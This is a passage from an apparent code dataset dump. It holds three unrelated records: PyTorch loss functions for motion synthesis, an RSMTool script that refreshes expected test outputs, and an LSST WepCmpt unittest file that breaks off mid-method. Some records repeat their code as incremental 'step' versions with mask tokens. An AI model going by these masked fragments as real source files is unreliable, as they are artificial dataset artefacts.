self.right_feet = config.right_foot\n self.vel_factor_dim = config.vel_factor_dim\n self.contact_loc = (self.contact_dim + self.velocity_dim + self.\n vel_factor_dim)\n\n def calculate_foot_vels(self, src_pos_seq, src_init_pos, left_foot,\n right_foot):\n temp_positions = torch.cat((torch.unsqueeze(src_init_pos, 1),\n src_pos_seq), 1)\n left_foot0_vel = (temp_positions[:, 1:, left_foot[0] * 3:left_foot[\n 0] * 3 + 3] - temp_positions[:, :-1, left_foot[0] * 3:left_foot\n [0] * 3 + 3]) ** 2\n left_foot0_vel = torch.sum(left_foot0_vel, -1, keepdim=True)\n left_foot1_vel = (temp_positions[:, 1:, left_foot[1] * 3:left_foot[\n 1] * 3 + 3] - temp_positions[:, :-1, left_foot[1] * 3:left_foot\n [1] * 3 + 3]) ** 2\n left_foot1_vel = torch.sum(left_foot1_vel, -1, keepdim=True)\n right_foot0_vel = (temp_positions[:, 1:, right_foot[0] * 3:\n right_foot[0] * 3 + 3] - temp_positions[:, :-1, right_foot[0] *\n 3:right_foot[0] * 3 + 3]) ** 2\n right_foot0_vel = torch.sum(right_foot0_vel, -1, keepdim=True)\n right_foot1_vel = (temp_positions[:, 1:, right_foot[1] * 3:\n right_foot[1] * 3 + 3] - temp_positions[:, :-1, right_foot[1] *\n 3:right_foot[1] * 3 + 3]) ** 2\n right_foot1_vel = torch.sum(right_foot1_vel, -1, keepdim=True)\n feet_vel = torch.cat((left_foot0_vel, left_foot1_vel,\n right_foot0_vel, right_foot1_vel), -1)\n return feet_vel\n\n def forward(self, predict_seq, 
_train_x1, _train_x2):\n init_pos = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim]\n src_pos_seq = predict_seq[..., :self.pos_dim + self.root_pos_dim\n ] * self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:\n self.pos_dim + self.root_pos_dim]\n src_init_pos = init_pos * self._std[:self.pos_dim + self.root_pos_dim\n ] + self._mean[:self.pos_dim + self.root_pos_dim]\n feet_vels = self.calculate_foot_vels(src_pos_seq, src_init_pos,\n self.left_feet, self.right_feet)\n feet_contact = torch.abs(predict_seq[..., -(self.contact_dim + self\n .velocity_dim):-self.velocity_dim] * self._std[-self.\n contact_loc:-(self.velocity_dim + self.vel_factor_dim)] + self.\n _mean[-self.contact_loc:-(self.velocity_dim + self.vel_factor_dim)]\n )\n contact_loss = torch.mean(torch.sum(torch.sum(feet_contact *\n feet_vels, dim=-1), dim=-1))\n return contact_loss * 2\n\n\nclass KeyframeLoss(nn.Module):\n\n def __init__(self, config):\n super().__init__()\n self.device = config.device\n self.root_pos_dim = config.root_pos_dim\n self.root_rot_dim = config.root_rot_dim\n self.pos_dim = config.pos_dim\n self.key_num = config.key_num\n\n def forward(self, predict_seq, _train_x1, gt_seq):\n key_frame1 = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim +\n self.root_rot_dim]\n key_frame2 = gt_seq[:, -1, :self.pos_dim + self.root_pos_dim + self\n .root_rot_dim]\n predict_pos = predict_seq[:, :, :self.pos_dim + self.root_pos_dim +\n self.root_rot_dim]\n num = predict_pos.shape[1]\n MSE_loss = nn.MSELoss()\n loss = torch.zeros([]).to(self.device)\n if num <= self.key_num * 2:\n for i in range(num):\n t = (i + 1) / (num + 1)\n pos = predict_pos[:, i, :]\n loss = loss + (1 - t) * MSE_loss(pos, key_frame1\n ) + t * MSE_loss(pos, key_frame2)\n else:\n for i in range(self.key_num):\n loss = loss + MSE_loss(predict_pos[:, i, :], key_frame1)\n for i in range(num - self.key_num, num):\n loss = loss + MSE_loss(predict_pos[:, i, :], key_frame2)\n return loss * 2\n\n\nclass SmoothLoss(nn.Module):\n\n def __init__(self, config):\n super().__init__()\n self.device = config.device\n self.root_pos_dim = config.root_pos_dim\n self.root_rot_dim = config.root_rot_dim\n self.pos_dim = config.pos_dim\n\n def forward(self, predict_seq, _train_x1, gt_seq):\n init_root_pos = _train_x1[:, :1, self.pos_dim:self.pos_dim + self.\n root_pos_dim]\n init_root_rot = _train_x1[:, :1, self.pos_dim + self.root_pos_dim:\n self.pos_dim + self.root_pos_dim + self.root_rot_dim]\n root_pos_seq = predict_seq[..., self.pos_dim:self.pos_dim + self.\n root_pos_dim]\n root_rot_seq = predict_seq[..., self.pos_dim + self.root_pos_dim:\n self.pos_dim + self.root_pos_dim + self.root_rot_dim]\n last_root_pos = gt_seq[:, -1, self.pos_dim:self.pos_dim + self.\n root_pos_dim]\n last_root_rot = gt_seq[:, -1, self.pos_dim + self.root_pos_dim:self\n .pos_dim + self.root_pos_dim + self.root_rot_dim]\n seq_num = len(root_pos_seq[0])\n batch_size = len(root_pos_seq)\n root_pos_item = torch.zeros([]).to(self.device)\n root_rot_item = torch.zeros([]).to(self.device)\n MSE_loss = nn.MSELoss()\n for idx in range(seq_num):\n if idx == 0:\n root_pos_temp = MSE_loss(root_pos_seq[:, :1, :],\n init_root_pos[:])\n root_rot_temp = MSE_loss(root_rot_seq[:, :1, :],\n init_root_rot[:])\n elif idx == seq_num - 1:\n root_pos_temp = MSE_loss(root_pos_seq[:, idx, :], last_root_pos\n ) + MSE_loss(root_pos_seq[:, idx - 1, :], last_root_pos)\n root_rot_temp = MSE_loss(root_rot_seq[:, idx, :], last_root_rot\n ) + MSE_loss(root_rot_seq[:, idx - 1, :], last_root_rot)\n else:\n root_pos_temp 
= torch.sum(torch.pow(root_pos_seq[:, idx, :] -\n root_pos_seq[:, idx - 1, :], 2)) / batch_size / seq_num\n root_rot_temp = torch.sum(torch.pow(root_rot_seq[:, idx, :] -\n root_rot_seq[:, idx - 1, :], 2)) / batch_size / seq_num\n root_pos_item = root_pos_item + root_pos_temp\n root_rot_item = root_rot_item + root_rot_temp\n loss = root_pos_item + root_rot_item\n return loss * 1.5\n",
"step-5": "import torch\nimport torch.nn as nn\n\n\nclass ReconstructionLoss(nn.Module):\n def __init__(self, config):\n super(ReconstructionLoss, self).__init__()\n self.velocity_dim = config.velocity_dim\n\n def forward(self, pre_seq, gt_seq):\n MSE_loss = nn.MSELoss()\n rec_loss = MSE_loss(pre_seq[:, 1:-1, :], gt_seq[:, 1:-1, :])+ \\\n MSE_loss(pre_seq[:, -1, :], gt_seq[:, -1, :]) + \\\n MSE_loss(pre_seq[:, 0, :-self.velocity_dim], gt_seq[:, 0, :-self.velocity_dim])\n return rec_loss * 3\n\n\nclass BoneLoss(nn.Module):\n def __init__(self, gt_bone_length, parents, _mean, _std, config):\n super(BoneLoss, self).__init__()\n self.gt_bone_length = gt_bone_length\n self.parents = parents\n self._mean = _mean\n self._std = _std\n self.device = config.device\n self.pos_dim = config.pos_dim\n\n def calculate_bone_length_for_seq(self, seq):\n # AddBackward0 [batch_size, T, size]\n src_seq = seq[..., :self.pos_dim] * self._std[:self.pos_dim] + self._mean[:self.pos_dim]\n\n # ViewBackward [batch_size, T, J-1, 3]\n new_seq = src_seq.view(src_seq.shape[0], src_seq.shape[1], int(src_seq.shape[2] / 3), 3)\n\n root_pos = torch.tensor([[0, 0, 0]], dtype=torch.float32).to(self.device)\n root_positions = torch.unsqueeze(torch.unsqueeze(root_pos, 0), 0)\n root_positions = root_positions.repeat(src_seq.shape[0], src_seq.shape[1], 1, 1)\n # CatBackward [batch_size, T, J, 3]\n positions = torch.cat((root_positions, new_seq), 2)\n\n # [200, 6, 23]\n result_list = torch.empty((src_seq.shape[0], src_seq.shape[1], int(src_seq.shape[2] / 3)),\n dtype=torch.float32).to(self.device)\n index = 0\n for joint, parent in enumerate(self.parents):\n if parent == -1:\n continue\n # [200, 6, 3] SelectBackward\n joint_pos = positions[:, :, joint]\n parent_pos = positions[:, :, parent]\n # [200, 6] SubBackward0\n delta_x = joint_pos[..., 0] - parent_pos[..., 0]\n delta_y = joint_pos[..., 1] - parent_pos[..., 1]\n delta_z = joint_pos[..., 2] - parent_pos[..., 2]\n # [200, 6] PowBackward0\n length_temp = (delta_x ** 2 + delta_y ** 2 + delta_z ** 2) ** 0.5\n result_list[..., index] = length_temp\n index += 1\n return result_list\n\n def forward(self, predict_seq, _train_x1, _train_x2):\n train_bone_length = self.calculate_bone_length_for_seq(predict_seq)\n _, gt_bone_length = torch.broadcast_tensors(train_bone_length, self.gt_bone_length)\n\n MSE_loss = nn.MSELoss()\n bone_loss = MSE_loss(train_bone_length, gt_bone_length)\n\n return bone_loss * 2\n\n\nclass VelocityLoss(nn.Module):\n def __init__(self, _mean, _std, config):\n super(VelocityLoss, self).__init__()\n self._mean = _mean\n self._std = _std\n self.device = config.device\n self.root_pos_dim = config.root_pos_dim\n self.pos_dim = config.pos_dim\n self.velocity_dim = config.velocity_dim\n self.vel_factor_dim = config.vel_factor_dim\n\n def calculate_velocity(self, src_pos_seq, src_init_pos):\n \"\"\"\n :param pos_seq: the position of predict sequence [Batch_size, seq_length, J * 3]\n :param init_pos: the position of initial frame\n :return:\n \"\"\"\n # [batch_size, T + 1, J * 3] grad_fn=<CatBackward>\n temp_positions = torch.cat((torch.unsqueeze(src_init_pos, 1), src_pos_seq), 1)\n velocity = temp_positions[:, 1:] - temp_positions[:, :-1]\n return velocity\n\n def get_vel_factor(self, velocity):\n batch_size = velocity.shape[0]\n seq_len = velocity.shape[1]\n joint_num = int(velocity.shape[-1] / 3)\n weight = [1, 2, 3, 4, 1, 2, 3, 4, 1, 1, 1, 1, 1, 1, 2, 3, 4, 1, 2, 3, 4, 1, 2, 1]\n parts = [1, 1, 1, 1, 2, 2, 2, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 4, 4, 4, 4, 0, 0, 0]\n 
weight_sum = []\n\n for part in range(5):\n p_sum = 0\n for j in range(joint_num):\n if parts[j] == part:\n p_sum += weight[j]\n weight_sum.append(p_sum)\n\n vel_factor = torch.empty((batch_size, seq_len, self.vel_factor_dim), dtype=torch.float32).to(self.device)\n for i in range(seq_len):\n factor = torch.zeros((batch_size, self.vel_factor_dim), dtype=torch.float32).to(self.device)\n for part in range(5):\n for j in range(joint_num):\n if parts[j] == part:\n factor[:, part: part + 1] = factor[:, part: part + 1] + weight[j] / weight_sum[part] * \\\n pow(pow(velocity[:, i:i + 1, j * 3], 2) +\n pow(velocity[:, i:i + 1, j * 3 + 1], 2) +\n pow(velocity[:, i:i + 1, j * 3 + 2], 2), 0.5)\n vel_factor[:, i, :] = factor\n\n return vel_factor\n\n def forward(self, predict_seq, _train_x1, _train_x2, _true_vel_factor):\n # velocity\n init_pos = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim]\n src_pos_seq = (predict_seq[..., :self.pos_dim + self.root_pos_dim] *\n self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:self.pos_dim + self.root_pos_dim])\n src_init_pos = (init_pos *\n self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:self.pos_dim + self.root_pos_dim])\n\n train_velocity = self.calculate_velocity(src_pos_seq, src_init_pos)\n\n # grad_fn=<DivBackward0>\n _train_velocity = (train_velocity -\n self._mean[-(self.velocity_dim + self.vel_factor_dim):-self.vel_factor_dim]) \\\n / self._std[-(self.velocity_dim + self.vel_factor_dim):-self.vel_factor_dim]\n\n train_vel_factor = self.get_vel_factor(train_velocity)\n\n _train_vel_factor = (train_vel_factor - self._mean[-self.vel_factor_dim:]) / self._std[-self.vel_factor_dim:]\n\n\n MSE_loss = nn.MSELoss()\n zero_seq = torch.zeros(predict_seq[:, 0, -self.velocity_dim:].shape).to(self.device)\n loss1 = MSE_loss(predict_seq[:, 1:, -self.velocity_dim:], _train_velocity[:, 1:, :]) * 10 \\\n + MSE_loss(predict_seq[:, 0, -self.velocity_dim:], zero_seq) * 20\n loss2 = MSE_loss(_true_vel_factor[:, 1:-1, :], _train_vel_factor[:, 1:, :]) * 10\n\n velocity_loss = loss1 * 2 + loss2 * 1.5\n return velocity_loss\n\n\nclass ContactLoss(nn.Module):\n def __init__(self, _mean, _std, config):\n super(ContactLoss, self).__init__()\n self._mean = _mean\n self._std = _std\n self.root_pos_dim = config.root_pos_dim\n self.pos_dim = config.pos_dim\n self.contact_dim = config.contact_dim\n self.velocity_dim = config.velocity_dim\n self.left_feet = config.left_foot\n self.right_feet = config.right_foot\n self.vel_factor_dim = config.vel_factor_dim\n self.contact_loc = self.contact_dim + self.velocity_dim + self.vel_factor_dim\n\n def calculate_foot_vels(self, src_pos_seq, src_init_pos, left_foot, right_foot):\n # [batch_size, T + 1, J * 3] grad_fn=<CatBackward>\n temp_positions = torch.cat((torch.unsqueeze(src_init_pos, 1), src_pos_seq), 1)\n\n left_foot0_vel = (temp_positions[:, 1:, left_foot[0] * 3:(left_foot[0] * 3 + 3)]\n - temp_positions[:, :-1, left_foot[0] * 3:(left_foot[0] * 3 + 3)]) ** 2\n left_foot0_vel = torch.sum(left_foot0_vel, -1, keepdim=True)\n left_foot1_vel = (temp_positions[:, 1:, left_foot[1] * 3:(left_foot[1] * 3 + 3)]\n - temp_positions[:, :-1, left_foot[1] * 3:(left_foot[1] * 3 + 3)]) ** 2\n left_foot1_vel = torch.sum(left_foot1_vel, -1, keepdim=True)\n right_foot0_vel = (temp_positions[:, 1:, right_foot[0] * 3:(right_foot[0] * 3 + 3)]\n - temp_positions[:, :-1, right_foot[0] * 3:(right_foot[0] * 3 + 3)]) ** 2\n right_foot0_vel = torch.sum(right_foot0_vel, -1, keepdim=True)\n right_foot1_vel = (temp_positions[:, 1:, right_foot[1] * 
3:(right_foot[1] * 3 + 3)]\n - temp_positions[:, :-1, right_foot[1] * 3:(right_foot[1] * 3 + 3)]) ** 2\n right_foot1_vel = torch.sum(right_foot1_vel, -1, keepdim=True)\n feet_vel = torch.cat((left_foot0_vel, left_foot1_vel, right_foot0_vel, right_foot1_vel), -1)\n return feet_vel # [batch_size, seq_size, 4]\n\n def forward(self, predict_seq, _train_x1, _train_x2):\n init_pos = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim]\n src_pos_seq = (predict_seq[..., :self.pos_dim + self.root_pos_dim] *\n self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:self.pos_dim + self.root_pos_dim])\n src_init_pos = (init_pos *\n self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:self.pos_dim + self.root_pos_dim])\n feet_vels = self.calculate_foot_vels(src_pos_seq, src_init_pos, self.left_feet,\n self.right_feet)\n\n feet_contact = torch.abs(predict_seq[..., -(self.contact_dim + self.velocity_dim):-self.velocity_dim] *\n self._std[-self.contact_loc:-(self.velocity_dim + self.vel_factor_dim)] + \\\n self._mean[-self.contact_loc:-(self.velocity_dim + self.vel_factor_dim)])\n contact_loss = torch.mean(torch.sum(torch.sum(feet_contact * feet_vels, dim=-1), dim=-1))\n return contact_loss * 2\n\n\nclass KeyframeLoss(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.device = config.device\n self.root_pos_dim = config.root_pos_dim\n self.root_rot_dim = config.root_rot_dim\n self.pos_dim = config.pos_dim\n self.key_num = config.key_num\n\n def forward(self, predict_seq, _train_x1, gt_seq):\n key_frame1 = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim + self.root_rot_dim]\n key_frame2 = gt_seq[:, -1, :self.pos_dim + self.root_pos_dim + self.root_rot_dim]\n predict_pos = predict_seq[:, :, :self.pos_dim + self.root_pos_dim + self.root_rot_dim]\n\n num = predict_pos.shape[1]\n MSE_loss = nn.MSELoss()\n loss = torch.zeros([]).to(self.device)\n if num <= self.key_num * 2:\n for i in range(num):\n t = (i + 1) / (num + 1)\n pos = predict_pos[:, i, :]\n loss = loss + (1 - t) * MSE_loss(pos, key_frame1) + t * MSE_loss(pos, key_frame2)\n else:\n for i in range(self.key_num):\n loss = loss + MSE_loss(predict_pos[:, i, :], key_frame1)\n for i in range(num - self.key_num, num):\n loss = loss + MSE_loss(predict_pos[:, i, :], key_frame2)\n return loss * 2\n\n\nclass SmoothLoss(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.device = config.device\n self.root_pos_dim = config.root_pos_dim\n self.root_rot_dim = config.root_rot_dim\n self.pos_dim = config.pos_dim\n\n def forward(self, predict_seq, _train_x1, gt_seq):\n init_root_pos = _train_x1[:, :1, self.pos_dim:self.pos_dim + self.root_pos_dim]\n init_root_rot = _train_x1[:, :1, self.pos_dim + self.root_pos_dim:\n self.pos_dim + self.root_pos_dim + self.root_rot_dim]\n root_pos_seq = predict_seq[..., self.pos_dim:self.pos_dim + self.root_pos_dim]\n root_rot_seq = predict_seq[..., self.pos_dim + self.root_pos_dim:\n self.pos_dim + self.root_pos_dim + self.root_rot_dim]\n last_root_pos = gt_seq[:, -1, self.pos_dim:self.pos_dim + self.root_pos_dim]\n last_root_rot = gt_seq[:, -1, self.pos_dim + self.root_pos_dim:\n self.pos_dim + self.root_pos_dim + self.root_rot_dim]\n\n # pos_seq SliceBackward\n seq_num = len(root_pos_seq[0])\n batch_size = len(root_pos_seq)\n root_pos_item = torch.zeros([]).to(self.device)\n root_rot_item = torch.zeros([]).to(self.device)\n MSE_loss = nn.MSELoss()\n for idx in range(seq_num):\n if idx == 0:\n # MeanBackward0\n root_pos_temp = MSE_loss(root_pos_seq[:, :1, :], init_root_pos[:])\n 
root_rot_temp = MSE_loss(root_rot_seq[:, :1, :], init_root_rot[:])\n elif idx == seq_num - 1:\n root_pos_temp = MSE_loss(root_pos_seq[:, idx, :], last_root_pos) + \\\n MSE_loss(root_pos_seq[:, idx - 1, :], last_root_pos)\n root_rot_temp = MSE_loss(root_rot_seq[:, idx, :], last_root_rot) + \\\n MSE_loss(root_rot_seq[:, idx - 1, :], last_root_rot)\n else:\n root_pos_temp = torch.sum(torch.pow(root_pos_seq[:, idx, :] - root_pos_seq[:, idx - 1, :], 2)) \\\n / batch_size / seq_num\n root_rot_temp = torch.sum(torch.pow(root_rot_seq[:, idx, :] - root_rot_seq[:, idx - 1, :], 2)) \\\n / batch_size / seq_num\n # AddBackward0\n root_pos_item = root_pos_item + root_pos_temp\n root_rot_item = root_rot_item + root_rot_temp\n loss = root_pos_item + root_rot_item # DivBackward0\n return loss * 1.5\n",
"step-ids": [
14,
18,
19,
23,
24
]
}
|
[
14,
18,
19,
23,
24
] |
#!/usr/bin/env python
"""
Update the expected test outputs and inputs for rsmsummarize and rsmcompare tests.
This script assumes that you have already run the entire test suite with
`nose2 -s tests`. Doing so generates the output under the given outputs
directory, which is then used to generate the new expected output under
`tests/data/experiments`.
#############################################################################################
# IMPORTANT: DO NOT RUN THIS SCRIPT BEFORE RUNNING THE TEST SUITE OR IT WILL BE DISASTROUS. #
#############################################################################################
The script works as follows. For each experiment test:
- The script locates the output under the updated outputs directory.
- New and changed files in this directory are copied over to the expected test
output location.
- Old files in the expected test output are deleted.
- Files that are already in the expected test output and have not changed are
left alone.
- Directories that are missing or empty under the updated test outputs are shown.
- For rsmsummarize and rsmcompare tests, the same logic is also applied to input
data. It is assumed that the input experiments are copies of the experiments
from existing tests.
Note: If running this script results in changes to the inputs for rsmcompare
or rsmsummarize tests, you will need to first re-run the tests for those two
tools and then, potentially, run this script again to update their test outputs.
See `documentation <https://rsmtool.readthedocs.io/en/main/contributing.html#writing-new-functional-tests>`_
for a further explanation of this process.
The script prints a log detailing the changes made for each experiment test.
:author: Nitin Madnani
:author: Anastassia Loukina
:author: Jeremy Biggs
:organization: ETS
"""
import argparse
import re
import sys
from pathlib import Path
from rsmtool.test_utils import FileUpdater
def main(): # noqa: D103
# set up an argument parser
parser = argparse.ArgumentParser(prog="update_test_files.py")
parser.add_argument(
"--tests",
dest="tests_dir",
required=True,
help="The path to the existing RSMTool tests directory",
)
parser.add_argument(
"--outputs",
dest="outputs_dir",
required=True,
help="The path to the directory containing the updated test "
"outputs (usually `test_outputs`)",
)
# parse given command line arguments
args = parser.parse_args()
# print out a reminder that the user should have run the test suite
run_test_suite = input("Have you already run the whole test suite? (y/n): ")
if run_test_suite == "n":
print("Please run the whole test suite using `nose2 -s tests` before running this script.")
sys.exit(0)
elif run_test_suite != "y":
print("Invalid answer. Exiting.")
sys.exit(1)
else:
print()
# iterate over the given tests directory and find all files named
# `test_experiment_*.py` and get their suffixes for use with the
# FileUpdater object.
suffixes = [
re.sub(r"test_experiment_", "", p.stem) for p in Path("tests").glob("test_experiment_*.py")
]
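    # e.g. a hypothetical file "tests/test_experiment_rsmtool_1.py" would
    # contribute the suffix "rsmtool_1"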
# instantiate a FileUpdater object
updater = FileUpdater(
test_suffixes=suffixes,
tests_directory=args.tests_dir,
updated_outputs_directory=args.outputs_dir,
)
# run the file updates
updater.run()
# now print the report from the updated object
updater.print_report()
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "7e20c61fa30ea93e69a2479e70449638eb52b7bb",
"index": 2964,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n parser = argparse.ArgumentParser(prog='update_test_files.py')\n parser.add_argument('--tests', dest='tests_dir', required=True, help=\n 'The path to the existing RSMTool tests directory')\n parser.add_argument('--outputs', dest='outputs_dir', required=True,\n help=\n 'The path to the directory containing the updated test outputs (usually `test_outputs`)'\n )\n args = parser.parse_args()\n run_test_suite = input('Have you already run the whole test suite? (y/n): '\n )\n if run_test_suite == 'n':\n print(\n 'Please run the whole test suite using `nose2 -s tests` before running this script.'\n )\n sys.exit(0)\n elif run_test_suite != 'y':\n print('Invalid answer. Exiting.')\n sys.exit(1)\n else:\n print()\n suffixes = [re.sub('test_experiment_', '', p.stem) for p in Path(\n 'tests').glob('test_experiment_*.py')]\n updater = FileUpdater(test_suffixes=suffixes, tests_directory=args.\n tests_dir, updated_outputs_directory=args.outputs_dir)\n updater.run()\n updater.print_report()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n parser = argparse.ArgumentParser(prog='update_test_files.py')\n parser.add_argument('--tests', dest='tests_dir', required=True, help=\n 'The path to the existing RSMTool tests directory')\n parser.add_argument('--outputs', dest='outputs_dir', required=True,\n help=\n 'The path to the directory containing the updated test outputs (usually `test_outputs`)'\n )\n args = parser.parse_args()\n run_test_suite = input('Have you already run the whole test suite? (y/n): '\n )\n if run_test_suite == 'n':\n print(\n 'Please run the whole test suite using `nose2 -s tests` before running this script.'\n )\n sys.exit(0)\n elif run_test_suite != 'y':\n print('Invalid answer. Exiting.')\n sys.exit(1)\n else:\n print()\n suffixes = [re.sub('test_experiment_', '', p.stem) for p in Path(\n 'tests').glob('test_experiment_*.py')]\n updater = FileUpdater(test_suffixes=suffixes, tests_directory=args.\n tests_dir, updated_outputs_directory=args.outputs_dir)\n updater.run()\n updater.print_report()\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nimport argparse\nimport re\nimport sys\nfrom pathlib import Path\nfrom rsmtool.test_utils import FileUpdater\n\n\ndef main():\n parser = argparse.ArgumentParser(prog='update_test_files.py')\n parser.add_argument('--tests', dest='tests_dir', required=True, help=\n 'The path to the existing RSMTool tests directory')\n parser.add_argument('--outputs', dest='outputs_dir', required=True,\n help=\n 'The path to the directory containing the updated test outputs (usually `test_outputs`)'\n )\n args = parser.parse_args()\n run_test_suite = input('Have you already run the whole test suite? (y/n): '\n )\n if run_test_suite == 'n':\n print(\n 'Please run the whole test suite using `nose2 -s tests` before running this script.'\n )\n sys.exit(0)\n elif run_test_suite != 'y':\n print('Invalid answer. Exiting.')\n sys.exit(1)\n else:\n print()\n suffixes = [re.sub('test_experiment_', '', p.stem) for p in Path(\n 'tests').glob('test_experiment_*.py')]\n updater = FileUpdater(test_suffixes=suffixes, tests_directory=args.\n tests_dir, updated_outputs_directory=args.outputs_dir)\n updater.run()\n updater.print_report()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/env python\n\"\"\"\nUpdate the expected test outputs and inputs for rsmsummarize and rsmcompare tests.\n\nThis script assumes that you have already run `nose2 -s tests` and ran the entire\ntest suite. By doing so, the output has been generated under the given outputs\ndirectory. And that is what will be used to generate the new expected output\nunder `tests/data/experiments`.\n\n#############################################################################################\n# IMPORTANT: DO NOT RUN THIS SCRIPT BEFORE RUNNING THE TEST SUITE OR IT WILL BE DISASTROUS. #\n#############################################################################################\n\nThe script works as follows. For each experiment test:\n- The script locates the output under the updated outputs directory.\n- New and changed files in this directory are copied over to the expected test\n output location.\n- Old files in the expected test output are deleted.\n- Files that are already in the expected test output and have not changed are\n left alone.\n- Directories that are missing or empty under the updated test outputs are shown.\n- For rsmsummarize and rsmcompare tests, the same logic is also applied to input\n data. It is assumed that the input experiments are copies of the experiments\n from existing tests.\n\nNote: If running this script results in changes to the inputs for rsmcompare\nor rsmsummarize tests, you will need to first re-run the tests for those two\ntools and then, potentially, run this script again to update their test outputs.\n\nSee `documentation <https://rsmtool.readthedocs.io/en/main/contributing.html#writing-new-functional-tests>`_\nfor a further explanation of this process.\n\nThe script prints a log detailing the changes made for each experiment test.\n\n:author: Nitin Madnani\n:author: Anastassia Loukina\n:author: Jeremy Biggs\n\n:organization: ETS\n\"\"\"\n\nimport argparse\nimport re\nimport sys\nfrom pathlib import Path\n\nfrom rsmtool.test_utils import FileUpdater\n\n\ndef main(): # noqa: D103\n # set up an argument parser\n parser = argparse.ArgumentParser(prog=\"update_test_files.py\")\n parser.add_argument(\n \"--tests\",\n dest=\"tests_dir\",\n required=True,\n help=\"The path to the existing RSMTool tests directory\",\n )\n parser.add_argument(\n \"--outputs\",\n dest=\"outputs_dir\",\n required=True,\n help=\"The path to the directory containing the updated test \"\n \"outputs (usually `test_outputs`)\",\n )\n\n # parse given command line arguments\n args = parser.parse_args()\n\n # print out a reminder that the user should have run the test suite\n run_test_suite = input(\"Have you already run the whole test suite? (y/n): \")\n if run_test_suite == \"n\":\n print(\"Please run the whole test suite using `nose2 -s tests` before running this script.\")\n sys.exit(0)\n elif run_test_suite != \"y\":\n print(\"Invalid answer. 
Exiting.\")\n sys.exit(1)\n else:\n print()\n\n # iterate over the given tests directory and find all files named\n # `test_experiment_*.py` and get their suffixes for use with the\n # FileUpdater object.\n suffixes = [\n re.sub(r\"test_experiment_\", \"\", p.stem) for p in Path(\"tests\").glob(\"test_experiment_*.py\")\n ]\n\n # instantiate a FileUpdater object\n updater = FileUpdater(\n test_suffixes=suffixes,\n tests_directory=args.tests_dir,\n updated_outputs_directory=args.outputs_dir,\n )\n\n # run the file updates\n updater.run()\n\n # now print the report from the updated object\n updater.print_report()\n\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import os
import shutil
import numpy as np
import unittest
from lsst.ts.wep.Utility import FilterType, runProgram
from lsst.ts.wep.WepController import WepController
from lsst.ts.wep.ctrlIntf.RawExpData import RawExpData
from lsst.ts.aoclcSim.Utility import getModulePath
from lsst.ts.aoclcSim.WepCmpt import WepCmpt
class TestWepCmpt(unittest.TestCase):
""" Test the WepCmpt class."""
def setUp(self):
self.outputDir = os.path.join(getModulePath(), "tests", "tmp")
self._makeDir(self.outputDir)
isrDirName = "input"
isrDir = os.path.join(self.outputDir, isrDirName)
self._makeDir(isrDir)
self.wepCmpt = WepCmpt(isrDir)
        # Set the survey parameters
self.wepCmpt.setFilter(FilterType.REF)
self.wepCmpt.setBoresight(0.0, 0.0)
self.wepCmpt.setRotAng(0.0)
def _makeDir(self, newDir):
os.makedirs(newDir, exist_ok=True)
def tearDown(self):
self.wepCmpt.disconnect()
shutil.rmtree(self.outputDir)
def testGetWepController(self):
wepCntlr = self.wepCmpt.getWepController()
self.assertTrue(isinstance(wepCntlr, WepController))
def testGetFilter(self):
filterType = self.wepCmpt.getFilter()
self.assertEqual(filterType, FilterType.REF)
def testSetFilter(self):
filterType = FilterType.R
self.wepCmpt.setFilter(filterType)
self.assertEqual(self.wepCmpt.getFilter(), filterType)
def testGetBoresight(self):
raInDeg, decInDeg = self.wepCmpt.getBoresight()
self.assertEqual(raInDeg, 0.0)
self.assertEqual(decInDeg, 0.0)
def testSetBoresight(self):
raInDeg = 10.0
decInDeg = 20.0
self.wepCmpt.setBoresight(raInDeg, decInDeg)
raInDegInWepCmpt, decInDegInWepCmpt = self.wepCmpt.getBoresight()
self.assertEqual(raInDegInWepCmpt, raInDeg)
self.assertEqual(decInDegInWepCmpt, decInDeg)
def testGetRotAng(self):
rotAngInDeg = self.wepCmpt.getRotAng()
self.assertEqual(rotAngInDeg, 0.0)
def testSetRotAng(self):
rotAngInDeg = 10.0
self.wepCmpt.setRotAng(rotAngInDeg)
self.assertEqual(self.wepCmpt.getRotAng(), rotAngInDeg)
def testIngestCalibs(self):
sensorNameList = ["R22_S11"]
fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)
numOfFile = self._getNumOfFileInFolder(fakeFlatDir)
self.assertEqual(numOfFile, 6)
self.wepCmpt.ingestCalibs(fakeFlatDir)
numOfFile = self._getNumOfFileInFolder(fakeFlatDir)
self.assertEqual(numOfFile, 0)
def _makeCalibs(self, outputDir, sensorNameList):
fakeFlatDirName = "fake_flats"
fakeFlatDir = os.path.join(self.outputDir, fakeFlatDirName)
self._makeDir(fakeFlatDir)
detector = " ".join(sensorNameList)
self._genFakeFlat(fakeFlatDir, detector)
return fakeFlatDir
def _genFakeFlat(self, fakeFlatDir, detector):
currWorkDir = os.getcwd()
os.chdir(fakeFlatDir)
self._makeFakeFlat(detector)
os.chdir(currWorkDir)
def _makeFakeFlat(self, detector):
command = "makeGainImages.py"
argstring = "--detector_list %s" % detector
runProgram(command, argstring=argstring)
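        # e.g. for detector "R22_S11 R22_S12" this runs:
        #     makeGainImages.py --detector_list R22_S11 R22_S12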
def _getNumOfFileInFolder(self, folder):
return len([name for name in os.listdir(folder)
if os.path.isfile(os.path.join(folder, name))])
def testGetSkyFile(self):
skyFile = self.wepCmpt.getSkyFile()
self.assertEqual(skyFile, "")
def testSetSkyFile(self):
skyFile = "testSetSkyFile"
